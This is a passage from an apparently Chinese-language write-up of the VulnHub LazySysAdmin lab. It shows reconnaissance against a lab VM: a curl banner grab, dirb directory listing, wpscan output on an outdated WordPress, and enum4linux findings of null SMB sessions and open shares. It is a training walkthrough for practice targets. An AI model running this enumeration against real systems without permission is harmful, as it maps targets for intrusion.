CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /Backnode_files/</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 123px;"></div><div class="CodeMirror-gutters" style="display: none; height: 153px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/1.png' alt='1' referrerPolicy='no-referrer' /></p><p>使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 <span class="cm-builtin">curl</span> <span class="cm-attribute">-I</span> <span class="cm-number">192</span>.168.0.100</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HTTP/1.1 <span class="cm-number">200</span> OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Date: Wed, <span class="cm-number">31</span> Jan <span class="cm-number">2018</span> <span class="cm-number">13</span>:01:20 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Server: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Last-Modified: Sun, <span class="cm-number">06</span> Aug <span class="cm-number">2017</span> <span class="cm-number">05</span>:02:15 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">ETag: <span class="cm-string">"8ce8-5560ea23d23c0"</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Accept-Ranges: bytes</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Length: <span class="cm-number">36072</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Vary: Accept-Encoding</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Type: text/html</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>再来查看dirb扫描结果,发现目标文章用的是wordpress,且还有phpmyadmin。</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  dirb222 <span class="cm-builtin">cat</span> /home/evilk0/Desktop/result.txt | <span class="cm-builtin">grep</span> <span class="cm-string">"^+"</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/index.html (CODE:200|SIZE:36072)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/info.php (CODE:200|SIZE:77257)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/robots.txt (CODE:200|SIZE:92)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/server-status (CODE:403|SIZE:293)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 560px;"></div><div class="CodeMirror-gutters" style="display: none; height: 590px;"></div></div></div></pre><p>wpscan扫描结果</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# wpscan http://192.168.0.100/wordpress</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        __          _______   _____                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        \ \        / /  __ \ / ____|                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           \  /\  /  | |     ____) | (__| (_| | | | |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">            \/  \/   |_|    |_____/ \___|\__,_|_| |_|</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        WordPress Security Scanner by the WPScan Team </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                       Version 2.9.3</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          Sponsored by Sucuri - https://sucuri.net</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] URL: http://192.168.0.100/wordpress/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Started: Thu Feb  1 01:37:20 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress theme in use: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Name: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Last updated: 2017-11-16T00:00:00.000Z</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The version is out of date, the latest version is 1.9</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme Name: Twenty Fifteen</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme URI: https://wordpress.org/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author: the WordPress team</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author URI: https://wordpress.org/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating plugins from passive detection ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] No plugins found</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Thu Feb  1 01:37:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 356</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 37.98 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:04</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 1273px;"></div><div class="CodeMirror-gutters" style="display: none; height: 1303px;"></div></div></div></pre><p> </p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/6.png' alt='6' referrerPolicy='no-referrer' /></p><p>enum4linux 192.168.0.100</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:08 <span class="cm-number">2018</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Target Information    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Target ........... <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">RID Range ........ <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Username ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Enumerating Workgroup/Domain on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got domain/workgroup name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Nbtstat Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Looking up status of <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>LAZYSYSADMIN    <00> <span class="cm-attribute">-</span>         B <ACTIVE>  Workstation Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>LAZYSYSADMIN    <03> <span class="cm-attribute">-</span>         B <ACTIVE>  Messenger Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>LAZYSYSADMIN    <20> <span class="cm-attribute">-</span>         B <ACTIVE>  File Server Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>WORKGROUP       <00> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Domain/Workgroup Name</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>WORKGROUP       <1e> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Browser Service Elections</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>MAC Address <span class="cm-operator">=</span> <span class="cm-number">00</span><span class="cm-attribute">-00-00-00-00-00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Session Check on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Server <span class="cm-number">192</span>.168.0.100 allows sessions using username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting domain SID <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Sid: (NULL SID)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Can<span class="cm-string">'t determine if host is part of domain or part of a workgroup</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    OS information on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from smbclient: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from srvinfo:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>platform_id     :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">500</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>os version      :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">6</span>.1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>server type     :<span class="cm-tab" role="presentation" cm-text="  ">   </span>0x809a03</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Share Enumeration on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>Sharename       Type      Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-attribute">---------</span>       <span class="cm-attribute">----</span>      <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>print<span class="cm-def">$ </span>         Disk      Printer Drivers</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>share<span class="cm-def">$ </span>         Disk      Sumshare</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>IPC<span class="cm-def">$ </span>           IPC       IPC Service (Web server)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Reconnecting with SMB1 <span 